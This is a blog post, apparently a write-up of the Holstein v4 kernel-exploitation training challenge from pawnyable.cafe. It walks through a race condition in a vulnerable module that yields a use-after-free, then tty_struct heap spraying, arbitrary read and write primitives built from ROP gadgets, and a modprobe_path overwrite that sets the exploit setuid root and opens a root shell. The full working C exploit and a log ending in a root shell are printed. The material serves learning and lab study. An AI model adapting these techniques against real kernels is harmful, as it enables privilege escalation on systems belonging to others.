Linux Kernel Exploitation: Exploiting race-condition + UAF

29 Jan 2024

Intro
Vulnerability analysis
Race to get double file descriptor
Racing on multiple CPUs
Heap spraying
AAR and AAW primitives
On the way to root
Overwriting modprobe_path
Lazy trick to spawn a shell
Full exploit
References

Intro

Welcome to my third post on Linux Kernel exploitation, be sure to check out part 1 and part 2. In this post, I will go over my exploit for Holstein v4: Race Condition challenge from pawnyable.cafe.

Vulnerability analysis

In this challenge we are presented with a vulnerable kernel module vuln.ko. It has defined functions for operations read, write, open and close.

It has also some global variables such as:

int mutex = 0;
char *g_buf = NULL;

Let’s take a look at module_open function:

static int module_open(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "module_open called\n");

    if (mutex) {
        printk(KERN_INFO "resource is busy");
        return -EBUSY;
    }
    mutex = 1;

    g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
    if (!g_buf) {
        printk(KERN_INFO "kmalloc failed");
        return -ENOMEM;
    }

    return 0;
}

Here we see that the function uses mutex variable as a way to prevent calling g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL) more than once.

Next let’s take a look at module_close function:

static int module_close(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "module_close called\n");
    kfree(g_buf);
    mutex = 0;
    return 0;
}

This function frees memory pointed to by g_buf.

These two functions alone pose a big security threat. The module_open function tries to prevent an attacker from opening the device twice to perform use-after-free attack. However, since Linux kernel is designed to be fast many things can happen in parallel. There is a small time window in which we can call module_open in two threads at the same time and obtain two file descriptors, both pointing to memory from kzalloc. If we free one file descriptor we can use the other one for use-after-free!

Other functions, module_read and module_write are pretty straightforward. They read or write max 0x400 bytes from/to g_buff.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
    printk(KERN_INFO "module_read called\n");

    if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
    }

    if (copy_to_user(buf, g_buf, count)) {
        printk(KERN_INFO "copy_to_user failed\n");
        return -EINVAL;
    }

    return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
    printk(KERN_INFO "module_write called\n");

    if (count > BUFFER_SIZE) {
        printk(KERN_INFO "invalid buffer size\n");
        return -EINVAL;
    }

    if (copy_from_user(g_buf, buf, count)) {
        printk(KERN_INFO "copy_from_user failed\n");
        return -EINVAL;
    }

    return count;
}

These functions allow us to bypass kaslr and to modify freed memory chunk.

Race to get double file descriptor

The first thing we want to achieve with our exploit is to have two file descriptors opened at the same time. To achieve this we need two threads racing against each other to open kernel module. This is how it looks like in code:

int fd1, fd2;
...
int win = 0;
void* race_fd(void *arg) {
    ...
    while (1) {
        while (!win) {
            int fd = open("/dev/holstein", O_RDWR);
            if (fd == fd2) {
                win = 1;
            }
            if (win == 0 && fd == fd1) {
                close(fd);
            }
        }
        // Other thread can still close fd, sanity check
        if (write(fd1, "A", 1) != 1 || write(fd2, "a", 1) != 1) {
            close(fd1);
            close(fd2);
            win = 0;
        } else {
            // All good
            break;
        }
    }
    return NULL;
}
...

// Check which fd will be assigned after UAF and assign them automatically
fd1 = open("/tmp", O_RDONLY);
fd2 = open("/tmp", O_RDONLY);
close(fd1);
close(fd2);
printf("[+] fd1=%d, fd2=%d\n", fd1, fd2);

// Race
pthread_create(&th1, NULL, race_fd, (void*)&t1_cpu);
pthread_create(&th2, NULL, race_fd, (void*)&t2_cpu);
pthread_join(th1, NULL);
pthread_join(th2, NULL);

// UAF
close(fd1);

This gives us two file descriptors fd1 and fd2 pointing to the same memory region. I added a sanity check to confirm I can indeed write to both file descriptors. Also, before racing I opened “/tmp” to check which file descriptors will be assigned next. Initially this value was hardcoded to 3 and 4 but later I realized if I want to utilize this bug multiple times or if the system opened some file the file descriptors would change and the exploit would be unstable.

Racing on multiple CPUs

For this race to succeed at least 2 CPU cores have to be present. The number of CPU cores can be changed in qemu configuration:

    -smp 2

Later I will increase CPU cores to test reliability.

For the race to be successful one thread needs to be run on one core, while the other on the other core. To make sure this is always the case, we can bind the thread to specific core. To achieve this we can use CPU sets.

cpu_set_t t1_cpu, t2_cpu;

// Create CPU set
CPU_ZERO(&t1_cpu);
CPU_ZERO(&t2_cpu);
CPU_SET(0, &t1_cpu);
CPU_SET(1, &t2_cpu);

And then on the start of the racing function:

// Limit thread to one CPU
cpu_set_t *cpu_set = (cpu_set_t*)arg;
if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
    perror("sched_setaffinity error");
}

With this changes the behaviour should be the same regardless of number of CPU cores present (if it’s higher than 2). We can now increase number of CPU cores in qemu configuration to test how often the race succeeds.

Heap spraying

Heap spraying on multiple CPU cores is a bit tricky. That is because SLUB allocator has cache implemented per CPU. For that reason we will use the trick mentioned before to bind thread on a single CPU and we will free previous spray allocations. I used tty_struct again for this heap spray but you can use whichever enables you RIP control.

void* spray_thread(void *arg) {
    int x;
    long spray[800];

    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    for (int i = 0; i < 800; i++) {
        //usleep(10);

        spray[i] = open("/dev/ptmx", O_RDONLY | O_WRONLY);
        // If spray fails close all handles and return
        if (spray[i] == -1) {
            puts("[-] FAIL spray");
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            return (void*)-1;
        }

        // Check if spray hit the UAF area
        if (read(fd2, &x, sizeof(int)) == sizeof(int) && x == 0x5401) {
            printf("[+] Spray hit! x=0x%x\n", x);
            // Close all other handles
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            // Return fd that controls UAF area
            return (void*)spray[i];
        }
    }
    for (int i = 0; i < 800; i++) {
        close(spray[i]);
    }
    puts("[+] Spray did not hit");

    return (void*)-1;
}

Here, I also added the check if the spray hit the use-after-free area and the check whether the first element corresponds to magic number from tty_struct which is 0x5401.

struct tty_struct {
	int	magic;
    ...

AAR and AAW primitives

For AAR and AAW primitives I used the same functions from the previous post except I saved the fd of the sprayed object so I don’t have to loop over all spawned objects. I sacrificed bytes starting from 127*8 position to store the ROP instruction because I wanted to use the same chunk I use to trigger the read/write. These bytes should correspond to the last element in tty_struct and with testing they did not cause the kernel to crash.

struct tty_struct {
    ...
	struct tty_port *port;
} __randomize_layout;

Here is the code for AAR and AAW.

long long AAR64(long long addr, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_rax_ptr_rdx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    return ioctl(fd, 0, addr);
}

void AAW32(long long addr, unsigned int val, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_ptr_rdx_ecx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    ioctl(fd, val, addr);
}

I also changed AAR to 64-bit version since I found gadget mov rax, qword ptr [rdx] and RDX is the register I have full 8-byte control over. I wanted to do the same with AAW but with ioctl() I can only control RDX (8-bytes) and ECX (4-bytes).

On the way to root

With successful bug trigger and primitives in place I proceeded to try to pivot to ROP chain like it was described in the authors solution. But there was an issue with my exploit. I couldn’t reliably trigger use-after-free twice in a row so I took a different approach. First I tried setting the threads name and scan the heap for it, but the exploit took forever to scan the heap and the string was not found. I’m guessing it has to do with using more CPU cores and SLUB having per CPU cache but I’m still not sure why It didn’t work. In the end I overwrote modprobe_path to get root.

Overwriting modprobe_path

Overwriting modprobe_path is pretty straightforward. I explained it a bit more in previous article. To find an address of modprobe_path you can load the vmlinux binary and search for string "/sbin/modprobe".

In [1]: from pwn import *

In [2]: kernel = ELF("./vmlinux")
[*] '/home/stupid/pawnyable-cafe/LK01-4/qemu/vmlinux'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0xffffffff81000000)
    Stack:    Executable
    RWX:      Has RWX segments

In [3]: hex(next(kernel.search(b"/sbin/modprobe")))
Out[3]: '0xffffffff81e384c0'

Now what’s left is to decine which program you want to call instead of modprobe. I looked over gtfobins to find an inspiration which program would give me an instant shell but all programs needed to be run with sudo and sudo was not available inside my qemu Linux kernel instance. It seemed like the only way to spawn a shell is to write another C program and call it.

int main() {
    printf("[+] getuid() returns %d\n", geteuid());
    setuid(0);
    setgid(0);
    system("/bin/sh");

    return 0;
}

Lazy trick to spawn a shell

Then I got an idea: why not hide the code inside the exploit itself?

I thought about dropping another file on the system from my exploit but then I realized I can just make the exploit behave differently if arguments are passed to it.

So I added a check at the start of main() function to see if argc == 2 (1 argument is passed). This way calling "./exploit whatever" would run only the “dropping shell” code instead of the whole exploit.

int main(int argc, char **argv) {
    // Too lazy to write separate program to spawn a shell
    if (argc == 2) {
        printf("[+] getuid() returns %d\n", geteuid());
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
    }

    // Normal exploit path
    int victim_fd = trigger_race_condition_uaf();
    ...
    puts("[+] Overwrote modprobe_path...");
    ...
    puts("[+] Spawning a shell");
    system("/exploit a");

And with that the exploit is complete!

Starting syslogd: OK
Starting klogd: OK
Running sysctl: OK
Saving random seed: OK
Starting network: OK
Starting dhcpcd...
dhcpcd-9.4.1 starting
no interfaces have a carrier
forked to background, child pid 101

Boot took 5.00 seconds

[ Holstein v4 (KL01-4) - Pawnyable ]
/ $ id
uid=1000 gid=1000 groups=1000
/ $ ./exploit 
[+] fd1=3, fd2=4
[+] Spray did not hit
[+] Spraying on another CPU...
[+] Spray hit! x=0x5401
[+] Spray successful! victim_fd=5
[+] leaked kbase = 0xffffffff84600000
[+] leaked g_buf = 0xffff8e6f81aa1c00
[+] Overwrote modprobe_path...
/tmp/a: line 1: ����: not found
[+] Spawning a shell
[+] getuid() returns 0
/ # id
uid=0(root) gid=0(root) groups=1000
/ # 

Full exploit

Here is the full exploit code. There are still improvements to be made to make it more reliable.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <pthread.h>
#include <sched.h>

#define mov_rax_ptr_rdx (kbase + 0x3c27b9) // mov rax, qword ptr [rdx] ; ret 
#define mov_ptr_rdx_ecx (kbase + 0x109ed) // mov dword ptr [rdx], ecx ; ret
#define modprobe_path (kbase + 0xe384c0)

int fd1, fd2;
long long user_cs, user_rflags, user_rsp, user_ss;
long long kbase, g_buf;
char buf[0x400];

// Wrapper around syscall to get thread id
pid_t gettid(void) {
    return syscall(SYS_gettid);
}

int win = 0;
void* race_fd(void *arg) {
    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    while (1) {
        while (!win) {
            int fd = open("/dev/holstein", O_RDWR);
            if (fd == fd2) {
                win = 1;
            }
            if (win == 0 && fd == fd1) {
                close(fd);
            }
        }
        // Other thread can still close fd, sanity check
        if (write(fd1, "A", 1) != 1 || write(fd2, "a", 1) != 1) {
            close(fd1);
            close(fd2);
            win = 0;
        } else {
            // All good
            break;
        }
    }
    return NULL;
}

void* spray_thread(void *arg) {
    int x;
    long spray[800];

    // Limit thread to one CPU
    cpu_set_t *cpu_set = (cpu_set_t*)arg;
    if (sched_setaffinity(gettid(), sizeof(cpu_set_t), cpu_set)) {
        perror("sched_setaffinity error");
    }

    for (int i = 0; i < 800; i++) {
        //usleep(10);

        spray[i] = open("/dev/ptmx", O_RDONLY | O_WRONLY);
        // If spray fails close all handles and return
        if (spray[i] == -1) {
            puts("[-] FAIL spray");
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            return (void*)-1;
        }

        // Check if spray hit the UAF area
        if (read(fd2, &x, sizeof(int)) == sizeof(int) && x == 0x5401) {
            printf("[+] Spray hit! x=0x%x\n", x);
            // Close all other handles
            for (int j = 0; j < i; j++) {
                close(spray[j]);
            }
            // Return fd that controls UAF area
            return (void*)spray[i];
        }
    }
    for (int i = 0; i < 800; i++) {
        close(spray[i]);
    }
    puts("[+] Spray did not hit");

    return (void*)-1;
}

int trigger_race_condition_uaf() {
    pthread_t th1, th2;
    long victim_fd = -1;
    int x;

    cpu_set_t t1_cpu, t2_cpu;

    // Create CPU set
    CPU_ZERO(&t1_cpu);
    CPU_ZERO(&t2_cpu);
    CPU_SET(0, &t1_cpu);
    CPU_SET(1, &t2_cpu);

    // Check which fd will be assigned after UAF and assign them automatically
    fd1 = open("/tmp", O_RDONLY);
    fd2 = open("/tmp", O_RDONLY);
    close(fd1);
    close(fd2);
    printf("[+] fd1=%d, fd2=%d\n", fd1, fd2);

    // Race
    pthread_create(&th1, NULL, race_fd, (void*)&t1_cpu);
    pthread_create(&th2, NULL, race_fd, (void*)&t2_cpu);
    pthread_join(th1, NULL);
    pthread_join(th2, NULL);

    // UAF
    close(fd1);

    victim_fd = (long)spray_thread((void*)&t1_cpu);

    while (victim_fd == -1 || x != 0x5401) {
        puts("[+] Spraying on another CPU...");
        pthread_create(&th1, NULL, spray_thread, &t2_cpu);
        pthread_join(th1, (void*)&victim_fd);
        read(fd2, &x, sizeof(int));
    }

    printf("[+] Spray successful! victim_fd=%d\n", (int)victim_fd);
    return victim_fd;
}

long long AAR64(long long addr, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_rax_ptr_rdx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    return ioctl(fd, 0, addr);
}

void AAW32(long long addr, unsigned int val, int fd) {
    long long* p = (long long*)&buf;

    p[127] = mov_ptr_rdx_ecx;
    p[3] = g_buf + 0x3f8 - 12*8;

    write(fd2, buf, 0x400);

    ioctl(fd, val, addr);
}

int main(int argc, char **argv) {
    // Too lazy to write separate program to spawn a shell
    if (argc == 2) {
        printf("[+] getuid() returns %d\n", geteuid());
        setuid(0);
        setgid(0);
        system("/bin/sh");
        return 0;
    }

    // Normal exploit path
    int victim_fd = trigger_race_condition_uaf();

    // Leak
    read(fd2, buf, 0x400);
    /*
    for (int i = 0; i < 0x400/8; i++) {
        printf("0x%llx\n", ((long long*)&buf)[i]);
    }
    */

    kbase = ((long long*)&buf)[73] - 0x332da0;
    g_buf = ((long long*)&buf)[7] - 0x38;

    // Sanity check in gdb
    //long long test = 0xcafebabecafebabe;
    //write(fd2, &test, 8);

    printf("[+] leaked kbase = 0x%llx\n", kbase);
    printf("[+] leaked g_buf = 0x%llx\n", g_buf);

    char cmd[] = "/tmp/xx\0";
    AAW32(modprobe_path, *(unsigned int*)&cmd[0], victim_fd);
    AAW32(modprobe_path + 4, *(unsigned int*)&cmd[4], victim_fd);

    puts("[+] Overwrote modprobe_path...");

    system("echo -e \"#!/bin/sh\nchown root:root /exploit\nchmod 4555 /exploit\" > /tmp/xx");
    system("chmod +x /tmp/xx");

    system("echo -e '\xff\xff\xff\xff' > /tmp/a");
    system("chmod +x /tmp/a");

    system("/tmp/a");

    puts("[+] Spawning a shell");
    system("/exploit a");

    return 0;
}

Thanks for reading!

References

https://pawnyable.cafe/linux-kernel/LK01/race_condition.html

https://elixir.bootlin.com/linux/v5.15/source/include/linux/tty.h

santaclz's blog